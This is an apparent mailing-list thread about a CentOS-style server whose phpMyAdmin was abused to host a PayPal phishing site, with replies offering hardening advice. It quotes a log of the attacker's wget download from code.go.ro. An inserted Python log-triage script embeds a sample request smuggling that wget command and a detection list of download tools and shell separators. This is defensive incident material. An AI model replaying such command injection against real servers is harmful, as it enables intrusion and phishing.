Everyone,

This morning I received a notice from PayPal that one of our sites got hacked and was spoofing a PayPal web site.

When I checked the site, I was surprised to find they were correct. About 5 days ago we had a server that got hacked and somehow the file paypal.com.tar got uploaded to our server and then stored in a subdirectory of /var/www/.

I had previously started a mysqld server and planned on using it for web authorizations. I had not been able to work on it, but left it in place. It looked like the hacker downloaded his paypal spoof files into a subdirectory of /var/www/phpmyadmin.

I am running 5.3 with all current updates.

I do not have telnet or ftp active on this server, and have password authentication of sshd turned off.

I have tried to obtain dialog with PayPal about this but they have not responded to my queries. If any of you have had some experience with this I would be interested in knowing how this may have happened. I have shut down the mysqld server as well as removed access in httpd.conf of the /var/www/phpmyadmin directory in order to shut down the spoofing site.

If any of you have a leg up on this I would appreciate your help.

Greg Ennis

P.S. I found the following entry in my error_log of /var/log/httpd/ :

[Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39
--00:21:14--  http://code.go.ro/paypal.com.tar
Resolving code.go.ro... 81.196.20.134
Connecting to code.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 645120 (630K) [application/x-tar]
Saving to: `paypal.com.tar'

     0K .......... .......... .......... .......... ..........  7% 70.0K 8s
    50K .......... .......... .......... .......... .......... 15%  265K 5s
   100K .......... .......... .......... .......... .......... 23%  284K 3s
   150K .......... .......... .......... .......... .......... 31% 1.81M 2s
   200K .......... .......... .......... .......... .......... 39% 1.79M 2s
   250K .......... .......... .......... .......... .......... 47%  323K 1s
   300K .......... .......... .......... .......... .......... 55% 1.80M 1s
   350K .......... .......... .......... .......... .......... 63% 1.76M 1s
   400K .......... .......... .......... .......... .......... 71%  431K 1s
   450K .......... .......... .......... .......... .......... 79% 1.77M 0s
   500K .......... .......... .......... .......... .......... 87% 1.75M 0s
   550K .......... .......... .......... .......... .......... 95% 1.82M 0s
   600K .......... .......... ..........                      100% 1.87M=1.6s

00:21:16 (405 KB/s) - `paypal.com.tar' saved [645120/645120]

sh: line 0: cd: pma: Not a directory
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error exit delayed from previous errors
On Fri, Aug 21, 2009 at 04:08:43PM -0500, Gregory P. Ennis wrote:
> Everyone,
>
> This morning I received a notice from PayPal that one of our sites got
> hacked and was spoofing a PayPal web site.
>
> When I checked the site, I was surprised to find they were correct.
> About 5 days ago we had a server that got hacked and somehow the file
> paypal.com.tar got uploaded to our server and then stored in a
> subdirectory of /var/www/.
>
> I had previously started a mysqld server and planned on using it for web
> authorizations. I had not been able to work on it, but left it in
> place. It looked like the hacker downloaded his paypal spoof files into
> a subdirectory of /var/www/phpmyadmin.
>
> I am running 5.3 with all current updates.
>
> I do not have telnet or ftp active on this server, and have password
> authentication of sshd turned off.
>
> I have tried to obtain dialog with PayPal about this but they have not
> responded to my queries. If any of you have had some experience with
> this I would be interested in knowing how this may have happened. I
> have shut down the mysqld server as well as removed access in httpd.conf
> of the /var/www/phpmyadmin directory in order to shut down the spoofing
> site.
>
> If any of you have a leg up on this I would appreciate your help.

Some advice (assuming the culprit here is phpMyAdmin):

- Keep phpMyAdmin up to date. The best way to do this is to use a package from a well known repository like EPEL that keeps the package at the latest version for you.
- Run with SELinux Enforcing.
- Protect phpMyAdmin with Basic HTTP authentication instead of relying only on phpMyAdmin's own authentication, which does nothing to prevent the exploitation of many URL-based vulnerabilities.

Ray
On 21.08.2009 at 23:08, Gregory P. Ennis wrote:
> I have tried to obtain dialog with PayPal about this but they have not
> responded to my queries.

Big surprise. They're like ebay (well, they *are* ebay...). Only boilerplate responses. Or nothing.
In their defense, they must get a lot of spam.

[....]

Interesting. What version of phpmyadmin was that?

Rainer
Gregory P. Ennis wrote:
> P.S. I found the following entry in my error_log of /var/log/httpd/ :
>
> [Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39
> --00:21:14-- http://code.go.ro/paypal.com.tar
> Resolving code.go.ro... 81.196.20.134
> Connecting to code.go.ro|81.196.20.134|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 645120 (630K) [application/x-tar]
> Saving to: `paypal.com.tar'
> ....

Looks like they spoofed something on your server, probably some kinda sloppy php, into running wget. I'd take a look at the access_log around the same timestamp to see if there are any hints as to how they did this.

http://xkcd.com/327/
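The suggestion above, checking access_log around the timestamp seen in error_log, can be scripted. This is an added example, not code from anyone in the thread: it parses constructed Apache combined-format access_log lines (sample data, not the poster's logs), selects the requests within a window of the error_log timestamp, and flags query strings that carry download-tool or embedded-URL tokens, which is how a wget invocation passed through a web request would surface.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed sample access_log lines (Apache combined format) for illustration;
# these are not from the poster's server.
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [16/Aug/2009:04:20:02 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Aug/2009:04:26:11 -0500] "GET /phpmyadmin/ HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
203.0.113.9 - - [16/Aug/2009:04:26:17 -0500] "GET /phpmyadmin/index.php?p=wget%20http%3A%2F%2Fcode.go.ro%2Fpaypal.com.tar HTTP/1.1" 200 318 "-" "Mozilla/4.0"
198.51.100.7 - - [16/Aug/2009:05:10:40 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Tokens that do not belong in a normal phpMyAdmin query string: download tools,
# embedded URLs and shell separators.
SUSPICIOUS = ("wget", "curl", "http://", "https://", ";", "|", "`")


def parse_access_line(line):
    """Return a dict for one access_log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Both logs come from the same host clock, so the tz offset can be dropped.
    ts = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"),
            "status": int(m.group("status"))}


def requests_near(access_log, error_log_ts, window_seconds=300):
    """Requests within +/- window_seconds of an error_log timestamp like
    'Sun Aug 16 04:26:19 2009', annotated with suspicious query tokens."""
    when = datetime.strptime(error_log_ts, "%a %b %d %H:%M:%S %Y")
    lo, hi = when - timedelta(seconds=window_seconds), when + timedelta(seconds=window_seconds)
    hits = []
    for line in access_log.splitlines():
        rec = parse_access_line(line)
        if rec is None or not (lo <= rec["ts"] <= hi):
            continue
        query = unquote_plus(rec["path"]).partition("?")[2]  # decoded query string only
        rec["flags"] = [tok for tok in SUSPICIOUS if tok in query]
        hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in requests_near(SAMPLE_ACCESS_LOG, "Sun Aug 16 04:26:19 2009"):
        mark = "SUSPICIOUS" if rec["flags"] else "ok"
        print(f'{rec["ts"]} {rec["ip"]} {rec["status"]} {mark:10} {rec["path"]} {rec["flags"]}')
```

On a real server, feed it the contents of /var/log/httpd/access_log and the error_log timestamp; the flagged request's source IP and path are the starting point for working out which script was abused.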
On Fri, 21 Aug 2009, Gregory P. Ennis wrote:
> place. It looked like the hacker downloaded his paypal spoof files into
> a subdirectory of /var/www/phpmyadmin
>
> I am running 5.3 with all current updates.

and third party software as well. We do not ship phpmyadmin, and clearly and repeatedly caution against it in the IRC channel -- its CVE history is appalling, and people are just not willing to remove it, or limit it to just a specific IP (not that I expect its ACL model to work either)

-- Russ herrold